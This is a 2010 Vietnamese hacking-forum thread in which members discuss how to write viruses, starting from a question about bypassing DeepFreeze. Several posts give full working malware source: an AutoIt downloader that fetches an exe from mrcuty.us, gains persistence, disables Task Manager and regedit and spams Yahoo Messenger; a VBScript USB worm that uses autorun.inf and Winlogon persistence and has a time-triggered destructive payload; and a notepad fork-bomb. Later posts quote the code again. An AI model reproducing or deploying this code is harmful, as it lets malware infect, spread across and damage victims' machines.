[Discussion] Góp ý viết code virus |
10/05/2010 14:03:02 (+0700) | #1 | 210632 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
Em đang thử viết một số code virus ( chỉ là nghiên cứu thôi chứ không phá hoại ) .
Hồi trước thấy người ta xôn xao về con SysSafe có thể xuyên thủng DeepFreezer ( ghi trực tiếp dữ liệu lên ổ cứng ) . Cho em hỏi làm sao viết một đoạn code nào đó để viết dữ liệu trực tiếp lên ổ cứng .
Thanks.
|
|
|
|
|
[Discussion] Góp ý viết code virus |
10/05/2010 17:08:49 (+0700) | #2 | 210640 |
|
Hacker1805
Member
|
0 |
|
|
Joined: 30/03/2010 12:52:06
Messages: 33
Offline
|
|
Bạn "đang thử viết" con virus đó bằng ngôn ngữ gì?
"Làm sao viết" thì còn tuỳ vào kiến thức của bạn.
Bạn nói rõ hơn để mọi người cũng "nghiên cứu" nhá |
|
-----------------------------------------------------------
Nhân đạo với kẻ thù là tàn bạo với chính mình
----------------------------------------------------------- |
|
|
|
[Discussion] Góp ý viết code virus |
10/05/2010 18:24:12 (+0700) | #3 | 210643 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
không có syssafe mà là safesys.Còn bạn DaigiaIQ_Y2.1k muốn "phá băng" thì mấy cái tool thiếu gì , hình như bên xgroupvn.org có đấy, hay google cũng được. Viết virus thì autoit là sự lựa chọn dễ nhất theo cả nghĩa đen lẫn nghĩa bóng (dễ thành công cũng như dễ bị bóc lịch nếu bị túm gáy)
PS:Code của safesys có search google cũng chẳng thấy đâu, đừng tìm vô ích |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
14/05/2010 13:43:35 (+0700) | #4 | 210878 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
_ Thì dĩ nhiên là viết bằng AutoIt rồi chứ không lẽ lại viết bằng pascal . " Làm sao viết " thì em cũng bó tay vì kiến thức của em chưa " đủ " để viết được đoạn mã này nên mới hỏi anh chứ .
_ Em không muốn phá băng bằng tools , nếu phá băng bằng tay hay tools thì ai chằng biết . Em muốn viết một con virus có khả năng ghi dữ liệu trực tiếp lên ổ cứng thôi .
|
|
|
|
|
[Discussion] Góp ý viết code virus |
14/05/2010 19:12:40 (+0700) | #5 | 210912 |
|
freeze_love
Member
|
0 |
|
|
Joined: 23/01/2009 23:07:19
Messages: 415
Location: HCMc
Offline
|
|
Lại 1 con gà đòi viết Virus = AutoIt . Hèn chi AutoIt vẫn còn bị BK đưa vào danh sách đen.
Lấy C***, VB ra viết , cứ nhè AutoIt. Một file exe sau khi biên dịch có srcip chỉ là hiện cái Msgbox mà đã mập đển ~ 300 Kb. Virus mà mập cỡ đó.
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi! |
|
do{
học đến điên;
}while (sống); |
|
|
|
[Discussion] Góp ý viết code virus |
14/05/2010 21:34:13 (+0700) | #6 | 210923 |
billylo22
Member
|
0 |
|
|
Joined: 23/04/2010 02:02:06
Messages: 6
Offline
|
|
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code |
|
|
|
|
[Discussion] Góp ý viết code virus |
15/05/2010 11:38:43 (+0700) | #7 | 210957 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code
vậy bác thử run cái này xem thử coi nó có bị kill không
em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay
Code:
#NoTrayIcon
$website = "http://mrcuty.us/"
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")
Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
xin nói thêm , bác chịu khó vào lục trong cái folder cài autoit của bác thì thấy ngay cái UPX trong ấy đấy ( nếu bác có cài autoit ) |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
15/05/2010 11:47:34 (+0700) | #8 | 210959 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
freeze_love wrote:
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi!
nhưng em thuộc loại ăn ớt không quen nên gặp khó khăn cũng nhiều anh ạ . Em biết là dân autoit "gộc" như ông anh cũng chán mấy cái vụ viết virus nên chuyển qua viết anti virus nhưng người ta cũng lỡ hỏi rồi thì trả lời 1 tiếng cho khỏi mất tình cảm |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
18/05/2010 07:03:03 (+0700) | #9 | 211149 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
Lại 1 con gà đòi viết Virus = AutoIt . Hèn chi AutoIt vẫn còn bị BK đưa vào danh sách đen.
Lấy C***, VB ra viết , cứ nhè AutoIt. Một file exe sau khi biên dịch có srcip chỉ là hiện cái Msgbox mà đã mập đển ~ 300 Kb. Virus mà mập cỡ đó.
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Nếu nó mập thì có thể compress hay pack lại thôi . Cái chuyện " dễ bị Decompile và DeObfuscate " thì tuỳ người , cách viết hay giải thuật họ sử dụng thôi anh . Vỏ quít dày có móng tay nhọn mà |
|
|
|
|
[Discussion] Góp ý viết code virus |
19/05/2010 18:22:02 (+0700) | #10 | 211231 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
rất tiếc là trong quá trình compile thì nó đã bị pack bởi UPX rồi |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
19/05/2010 18:29:24 (+0700) | #11 | 211232 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
cái này em chưa biết , dù sao cũng cám ơn anh cho ý kiến . |
|
|
|
|
[Discussion] Góp ý viết code virus |
21/05/2010 18:44:37 (+0700) | #12 | 211339 |
Đây nữa này
Code:
On Error Resume Next
strComputer = "."
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Run "explorer.exe \"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_LocalTime")
For Each objItem in colItems
TheDay = objItem.Day
TheMonth = objItem.Month
TheYear = objItem.Year
Next
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
const HKEY_LOCAL_MACHINE = &H80000002
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
Err.Clear
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day")
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month")
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year")
errnum = Err.Number
If errnum <> 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day",TheDay,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month",TheMonth,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year",TheYear,"REG_SZ"
End If
StrDay = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day")
StrMonth = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month")
StrYear = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year")
Sumday = (TheDay + TheMonth*30 + TheYear*360) - (StrDay + StrMonth*30 + StrYear*360)
If 0 < Sumday And Sumday < 5 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","1","REG_SZ"
End If
If 5 <= Sumday And Sumday < 10 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","2","REG_SZ"
End If
If Sumday >= 10 Or Sumday < 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","3","REG_SZ"
End If
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","2"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","0"
oReg.SetStringValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","Explorer.exe userinit.vbs"
oReg.SetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","QuangMinh.vbs"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
unattrib ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe")
objFSO.DeleteFile ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe")
Function destroy(dr)
If dr = "1" Then
oReg.EnumKey HKEY_CLASSES_ROOT,".exe",arrSubKeys
For Each subkey In arrSubKeys
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe\" & subkey
Next
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe"
End If
If dr = "2" Then
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive","67108863","REG_DWORD"
End If
If dr = "3" Then
oReg.SetStringValue HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","Userinit","C:\WINDOWS\system32\QuangMinh.vbs"
WSHShell.Run "c:\windows\system32\shutdown -l"
End If
End Function
Function unattrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes AND 1
objFile.Attributes = objFile.Attributes AND 2
objFile.Attributes = objFile.Attributes AND 4
End Function
Function attrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes OR 1
objFile.Attributes = objFile.Attributes OR 2
objFile.Attributes = objFile.Attributes OR 4
End Function
Function autorun(path)
Set objFile = objFSO.CreateTextFile(path)
objFile.Close
Set objTextFile = objFSO.OpenTextFile(path, 8, True)
objTextFile.WriteLine("[autorun]")
objTextFile.WriteLine("open=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.WriteLine("action=Open folder to view files")
objTextFile.WriteLine("shell\open=Open")
objTextFile.WriteLine("shell\open\command=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.WriteLine("shell\open\default=1")
objTextFile.WriteLine("shell\explore\Command=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.Close
End Function
Function read(path)
Set objTextFile = objFSO.OpenTextFile(path, 1)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
If strNextLine = "open=C:\windows\system32\wscript.exe QuangMinh.vbs" Then
fileok = "y"
Exit Do
End If
Loop
End Function
Do
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'WScript.exe'")
If colProcesses.Count < 2 Then
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'Explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
WSHShell.Run "QuangMinh.vbs"
End If
oReg.GetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\Date","Destroy",StrDestroy
If StrDestroy = "1" Then
destroy("1")
End If
If StrDestroy = "2" Then
destroy("2")
End If
If StrDestroy = "3" Then
destroy("3")
End If
WScript.Sleep 100
objFSO.CopyFile "QuangMinh.vbs" , "C:\windows\system32\syskm.dll", TRUE
attrib("C:\windows\system32\syskm.dll")
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objDrive.IsReady = True Then
fileok = "n"
read(objDrive.DriveLetter & ":\autorun.inf")
If fileok = "n" Then
unattrib(objDrive.DriveLetter & ":\autorun.inf")
autorun(objDrive.DriveLetter & ":\autorun.inf")
attrib(objDrive.DriveLetter & ":\autorun.inf")
End If
objFSO.CopyFile "C:\windows\system32\syskm.dll" , objDrive.DriveLetter & ":\QuangMinh.vbs", TRUE
End If
Next
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\QuangMinh.vbs", TRUE
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\userinit.vbs", TRUE
Loop
|
|
|
|
|
[Discussion] Góp ý viết code virus |
22/05/2010 11:21:06 (+0700) | #13 | 211394 |
Thêm chú nữa này
Code:
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set thoi_Xong= CreateObject("WScript.Shell")
Do
thoi_Xong.run "notepad",false
loop
Con này k nguy hiểm lắm nhưng nghịch cho vui |
|
|
|
|
[Discussion] Góp ý viết code virus |
24/05/2010 07:14:51 (+0700) | #14 | 211510 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
Cái virus .vbs ở trên chỉ có khả năng gọi notepad liên tục gây đứng máy thôi . Con này em nghịch hoài . Dù sao cũng cám ơn anh đóng góp ý kiến |
|
|
|
|
[Discussion] Góp ý viết code virus |
24/05/2010 19:01:14 (+0700) | #15 | 211571 |
Con đó chôm bên vnZoom về |
|
|
|
|
[Discussion] Góp ý viết code virus |
28/05/2010 19:07:50 (+0700) | #16 | 211833 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
freeze_love wrote:
Lại 1 con gà đòi viết Virus = AutoIt
Chú Nam nói vậy hơi ' Chanh chua ' nha . Cháu chỉ là dân newbie nên cũng không hiểu biết rộng bằng chú . Nên mới nhờ đến các cô chú ở HVA . |
|
|
|
|
[Discussion] Góp ý viết code virus |
29/05/2010 19:06:09 (+0700) | #17 | 211869 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
Bác ấy có chút xíu vấn đề với Admin của Autoitvn ( chuyên ngâm cú malware
viết bằng Autoit )nên ...thế đấy |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
01/06/2010 18:35:39 (+0700) | #18 | 212088 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
MinhNguyenQuang75 wrote:
billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code
vậy bác thử run cái này xem thử coi nó có bị kill không smilie
em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay
Code:
#NoTrayIcon
$website = "http://mrcuty.us/"
If Not FileExists(@WindowsDir & "\taskmng.exe" Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz"
Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", ""
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m"
Send("un"
Send("^v {ENTER}{ENTER}"
Send("^m"
Send("{DOWN}"
Send("^{SHIFTDOWN}{END}{SHIFTUP}"
Send("{ENTER}"
Send("^v {ENTER}"
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
MinhNguyenQuang75 wrote:
On Error Resume Next
strComputer = "."
Set objFSO = CreateObject("Scripting.FileSystemObject"
Set WSHShell = WScript.CreateObject("WScript.Shell"
WSHShell.Run "explorer.exe \"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2"
Set colItems = objWMIService.ExecQuery("Select * from Win32_LocalTime"
For Each objItem in colItems
TheDay = objItem.Day
TheMonth = objItem.Month
TheYear = objItem.Year
Next
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
const HKEY_LOCAL_MACHINE = &H80000002
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv"
Err.Clear
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"
errnum = Err.Number
If errnum <> 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day",TheDay,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month",TheMonth,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year",TheYear,"REG_SZ"
End If
StrDay = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"
StrMonth = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"
StrYear = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"
Sumday = (TheDay + TheMonth*30 + TheYear*360) - (StrDay + StrMonth*30 + StrYear*360)
If 0 < Sumday And Sumday < 5 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","1","REG_SZ"
End If
If 5 <= Sumday And Sumday < 10 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","2","REG_SZ"
End If
If Sumday >= 10 Or Sumday < 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","3","REG_SZ"
End If
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","2"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","0"
oReg.SetStringValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","Explorer.exe userinit.vbs"
oReg.SetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","QuangMinh.vbs"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
unattrib ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
objFSO.DeleteFile ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
Function destroy(dr)
If dr = "1" Then
oReg.EnumKey HKEY_CLASSES_ROOT,".exe",arrSubKeys
For Each subkey In arrSubKeys
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe\" & subkey
Next
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe"
End If
If dr = "2" Then
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive","67108863","REG_DWORD"
End If
If dr = "3" Then
oReg.SetStringValue HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","Userinit","C:\WINDOWS\system32\QuangMinh.vbs"
WSHShell.Run "c:\windows\system32\shutdown -l"
End If
End Function
Function unattrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes AND 1
objFile.Attributes = objFile.Attributes AND 2
objFile.Attributes = objFile.Attributes AND 4
End Function
Function attrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes OR 1
objFile.Attributes = objFile.Attributes OR 2
objFile.Attributes = objFile.Attributes OR 4
End Function
Function autorun(path)
Set objFile = objFSO.CreateTextFile(path)
objFile.Close
Set objTextFile = objFSO.OpenTextFile(path, 8, True)
objTextFile.WriteLine("[autorun]"
objTextFile.WriteLine("open=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.WriteLine("action=Open folder to view files"
objTextFile.WriteLine("shell\open=Open"
objTextFile.WriteLine("shell\open\command=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.WriteLine("shell\open\default=1"
objTextFile.WriteLine("shell\explore\Command=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.Close
End Function
Function read(path)
Set objTextFile = objFSO.OpenTextFile(path, 1)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
If strNextLine = "open=C:\windows\system32\wscript.exe QuangMinh.vbs" Then
fileok = "y"
Exit Do
End If
Loop
End Function
Do
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'WScript.exe'"
If colProcesses.Count < 2 Then
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'Explorer.exe'"
For Each objProcess in colProcessList
objProcess.Terminate()
Next
WSHShell.Run "QuangMinh.vbs"
End If
oReg.GetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\Date","Destroy",StrDestroy
If StrDestroy = "1" Then
destroy("1"
End If
If StrDestroy = "2" Then
destroy("2"
End If
If StrDestroy = "3" Then
destroy("3"
End If
WScript.Sleep 100
objFSO.CopyFile "QuangMinh.vbs" , "C:\windows\system32\syskm.dll", TRUE
attrib("C:\windows\system32\syskm.dll"
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objDrive.IsReady = True Then
fileok = "n"
read(objDrive.DriveLetter & ":\autorun.inf"
If fileok = "n" Then
unattrib(objDrive.DriveLetter & ":\autorun.inf"
autorun(objDrive.DriveLetter & ":\autorun.inf"
attrib(objDrive.DriveLetter & ":\autorun.inf"
End If
objFSO.CopyFile "C:\windows\system32\syskm.dll" , objDrive.DriveLetter & ":\QuangMinh.vbs", TRUE
End If
Next
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\QuangMinh.vbs", TRUE
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\userinit.vbs", TRUE
Loop
Em cảm ơn anh MinhNguyenQuang75 nhiều lắm nhưng hình như đoạn ( không phải hình như mà là chắc chắn ) đoạn mã này không có khả năng ghi dữ liệu trực tiếp lên máy tính .
Dù sao em cũng cảm ơn anh đã đóng góp ý kiến .
Thân ! |
|
|
|
|
[Discussion] Góp ý viết code virus |
01/06/2010 19:56:37 (+0700) | #19 | 212102 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
|
Cái đoạn đó dis mất cái taskmanager + regedit + siêu ẩn + lây vào explore.exe cho mỗi lần khởi động winlogon.exe là máy nạn nhân dính chưởng
PS : sao không thấy dòng #no tray icon hả bác minhnguyenquang75 |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
04/06/2010 18:36:50 (+0700) | #20 | 212357 |
daigiaIQ_Y2.1K
Member
|
0 |
|
|
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
|
|
Mấy cái mã vbs này nhà em có đầy , nhưng chẳng có con nào có khả năng xuyên thủng deep freezer được |
|
|
|
|
[Discussion] Góp ý viết code virus |
04/06/2010 18:55:57 (+0700) | #21 | 212363 |
|
handaewoo
Member
|
0 |
|
|
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
|
